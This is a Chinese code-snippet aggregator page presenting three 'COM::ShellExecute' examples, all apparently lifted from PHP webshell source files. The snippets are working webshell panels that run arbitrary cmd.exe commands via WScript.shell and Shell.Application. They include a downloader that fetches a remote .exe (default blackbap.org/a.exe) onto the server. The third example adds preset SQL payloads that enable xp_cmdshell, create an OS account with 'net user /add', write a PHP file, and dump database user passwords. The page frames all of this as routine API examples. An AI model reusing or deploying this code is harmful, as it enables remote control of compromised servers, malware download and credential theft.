当前位置: 首页>>代码示例>>PHP>>正文


PHP COM::ShellExecute方法代码示例

本文整理汇总了PHP中COM::ShellExecute方法的典型用法代码示例。如果您正苦于以下问题:PHP COM::ShellExecute方法的具体用法?PHP COM::ShellExecute怎么用?PHP COM::ShellExecute使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在COM的用法示例。


在下文中一共展示了COM::ShellExecute方法的3个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的PHP代码示例。

示例1: Com_h

function Com_h()
{
    $object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
    print <<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
<a href="?s=h&o=wscript">[WScript.shell]</a> 
<a href="?s=h&o=application">[Shell.Application]</a> 
<a href="?s=h&o=downloader">[Downloader]</a></div>
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}">
END;
    if ($object == 'downloader') {
        $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe';
        $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__) . '/a.exe');
        print <<<END
<div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
END;
        if (!empty($_POST['durl']) && !empty($_POST['dpath'])) {
            echo '<div class="actall">';
            $contents = @file_get_contents($_POST['durl']);
            if (!$contents) {
                echo '无法下载数据';
            } else {
                echo File_Write($_POST['dpath'], $contents, 'wb') ? '下载成功' : '下载失败';
            }
            echo '</div>';
        }
    } elseif ($object == 'wscript') {
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
        print <<<END
<div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
        if (!empty($_POST['cmd'])) {
            echo '<div class="actall">';
            $shell = new COM('wscript');
            $exe = @$shell->exec("cmd.exe /c " . $cmd);
            $out = $exe->StdOut();
            $output = $out->ReadAll();
            echo '<pre>' . $output . '</pre>';
            @$shell->Release();
            $shell = NULL;
            echo '</div>';
        }
    } elseif ($object == 'application') {
        $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\boot.ini d:\\a.txt';
        print <<<END
<div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div>
<div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
        if (!empty($_POST['run'])) {
            echo '<div class="actall">';
            $shell = new COM('application');
            echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? '执行成功' : '执行失败';
            @$shell->Release();
            $shell = NULL;
            echo '</div>';
        }
    } elseif ($object == 'adodb') {
        $string = isset($_POST['string']) ? $_POST['string'] : '';
        $sql = isset($_POST['sql']) ? $_POST['sql'] : '';
        print <<<END
<script language="javascript">
function hFull(i){
\tif(i==0 || i==5) return false;
\tStr = new Array(12);  
\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb";
\tStr[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**";
\tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**";
\tStr[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
\tStr[6] = "SELECT * FROM [TableName] WHERE ID<10";
\tStr[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')";
\tStr[8] = "DELETE FROM [TableName] WHERE ID=1";
\tStr[9] = "UPDATE [TableName] SET USER='yoco' WHERE ID=1";
\tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
\tStr[11] = "DROP TABLE [TableName]";
\tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
\tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
\tif(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
\treturn true;
}
</script>
<div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--连接示例--</option>
<option value="1">Access连接</option>
<option value="2">MsSql连接</option>
<option value="3">MySql连接</option>
<option value="4">Oracle连接</option>
<option value="5">--SQL语法--</option>
<option value="6">显示数据</option>
<option value="7">添加数据</option>
<option value="8">删除数据</option>
<option value="9">修改数据</option>
<option value="10">建数据表</option>
<option value="11">删数据表</option>
<option value="12">添加字段</option>
//.........这里部分代码省略.........
开发者ID:wucaishi,项目名称:WebShell-1,代码行数:101,代码来源:Silic+Group+php+Webshell+v3.php

示例2: p

    p('day:');
    makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
    p('hour:');
    makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
    p('minute:');
    makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
    p('second:');
    makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
    p('</p>');
    formfooter();
    goback();
} elseif ($action == 'shell') {
    if (IS_WIN && IS_COM) {
        if ($program && $parameter) {
            $shell = new COM('Shell.Application');
            $a = $shell->ShellExecute($program, $parameter);
            m('Program run has ' . (!$a ? 'success' : 'fail'));
        }
        !$program && ($program = 'c:\\windows\\system32\\cmd.exe');
        !$parameter && ($parameter = '/c net start > ' . SA_ROOT . 'log.txt');
        formhead(array('title' => 'Execute Program'));
        makehide('action', 'shell');
        makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
        p('<p>');
        makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
        makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
        p('</p>');
        formfoot();
    }
    formhead(array('title' => 'Execute Command'));
    makehide('action', 'shell');
开发者ID:mcanv,项目名称:webshell,代码行数:31,代码来源:2009mssql.php

示例3: Com_h

function Com_h()
{
    $object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
    $com = array("adodb" => "ADODB.Connection", "wscript" => "WScript.shell", "application" => "Shell.Application");
    print <<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
<a href="?s=h&o=wscript">[WScript.shell]</a> 
<a href="?s=h&o=application">[Shell.Application]</a></div>
<div class="actall" style="height:200px;">
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}"><br>
END;
    $shell = new COM($com[$object]);
    if ($object == 'wscript') {
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
        $cmdpath = isset($_POST['cmdpath']) ? $_POST['cmdpath'] : 'c:\\windows\\system32\\cmd.exe';
        print <<<END
&nbspcmdpath:<input type="text" name="cmdpath" value="{$cmdpath}" style="width:600px;"><br>
command:<input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<input class="bt" type="submit" value="execute"></form><br>
END;
        if (!empty($_POST['cmd'])) {
            $exe = @$shell->exec("{$cmdpath} /c " . $cmd);
            $out = $exe->StdOut();
            $output = $out->ReadAll();
            echo '<pre>' . $output . '</pre>';
        }
    } elseif ($object == 'application') {
        $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
        $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\windows\\php.ini c:\\php.ini';
        print <<<END
Path:<br><input type="text" name="run" value="{$run}" style="width:600px;">
<br><br>Command argv:<br><input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<br><br><input class="bt" type="submit" value="execute"></form><br>
END;
        if (!empty($_POST['run'])) {
            echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? 'Done' : 'Faild';
        }
    } elseif ($object == 'adodb') {
        $string = isset($_POST['string']) ? $_POST['string'] : '';
        $sql = isset($_POST['sql']) ? $_POST['sql'] : '';
        print <<<END
<script language="javascript">
function hFull(i){
\tif(i==0 || i==10) return false;
\tStr = new Array(12);  
\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb;Jet OLEDB:Database Password=***";
\tStr[2] = "Driver={Sql Server};Server=localhost,1433;Database=DbName;Uid=sa;Pwd=sa";
\tStr[3] = "Driver={MySql};Server=localhost;Port=3306;Database=DbName;Uid=root;Pwd=root";
\tStr[4] = "Provider=OraOLEDB.Oracle.1;User ID=oracle;Password=oracle;Data Source=ORACLE;Persist Security Info=True;";
        Str[5] = "driver={IBM db2 odbc DRIVER};database=mydb;hostname=localhost;port=50000;protocol=TCPIP;uid=root; pwd=pass";
        Str[6] = "DRIVER={POSTGRESQL};SERVER=127.0.0.1;DATABASE=PostGreSQL;UID=postgresql;PWD=123456;";
        Str[7] = "Dsn='';Driver={INFORMIX 3.30 32 BIT};Host=myHostname;Server=myServerName;Service=myServiceName;Protocol=olsoctcp;Database=myDbName;UID=myUsername;PWD=myPassword";
\tStr[8] = "DSN=mydns;Uid=username;Pwd=password";
        Str[9] = "FILEDNS=c:\\\\path\\\\db.dsn;Uid=username;Pwd=password";
        Str[11] = "SELECT * FROM [TableName] WHERE ID<100";
\tStr[12] = "INSERT INTO [TableName](USER,PASS) VALUES('b4che10r','mypass')";
\tStr[13] = "UPDATE [TableName] SET USER='b4che10r' WHERE ID=100";
\tStr[14] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
\tStr[15] = "DROP TABLE [TableName]";
\tStr[16] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
        Str[17] = "select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r abc123 /add');";
        Str[18] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
        Str[19] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
        Str[20] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
        Str[21] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')";
        Str[22] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')";
        Str[23] = "Declare @s  int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo '<?php phpinfo();?>' > c:\\info.php';";
\tStr[24] = "sp_makewebtask @outputfile='d:\\\\web\\\test.php',@charset=gb2312,@query='select test';";
        Str[25] = "Exec master.dbo.xp_cmdshell 'ver';";
        Str[26] = "Select Name FROM Master..SysDatabases;";
        Str[27] = "select name from sysobjects where type='U';";
        Str[28] = "Select Name from SysColumns Where id=Object_Id('TableName');";
        Str[29] = "select username,password from dba_users;";
        Str[30] = "select TABLE_NAME from all_tables;";
        Str[31] = "desc admin;";
        Str[32] = "grant connect,resource,dba to user_name;";
        Str[33] = "select datname from pg_database;";
        Str[34] = "select relname from pg_stat_user_tables;";
        Str[35] = "\\\\d table_name";
        Str[36] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
        Str[37] = "\\\\! uname -a";
        Str[38] = "select schemaname from syscat.schemata;";
        Str[39] = "select name from sysibm.systables;";
        Str[40] = "select colname from syscat.columns where tabname='table_name';";
        Str[41] = "db2 get db cfg for db_name;";
        Str[42] = "select name from sysdatabases;";
        Str[43] = "select tabname from systables where tabid=n;";
        Str[44] = "select tabname,colname,owner,coltype from syscolumns join systables on syscolumns.tabid = systables.tabid;";
        Str[45] = "select username,usertype,password from sysusers;";
        if(i<=9){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
\treturn true;
}
</script>
conn strings:<br> <input type="text" name="string" id="string" value="{$string}" style="width:800px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--select range--</option>
<option value="1">Access</option>
<option value="2">MsSql</option>
<option value="3">MySql</option>
<option value="4">Oracle</option>
//.........这里部分代码省略.........
开发者ID:mcanv,项目名称:webshell,代码行数:101,代码来源:r00ts+php大马.php


注:本文中的COM::ShellExecute方法示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。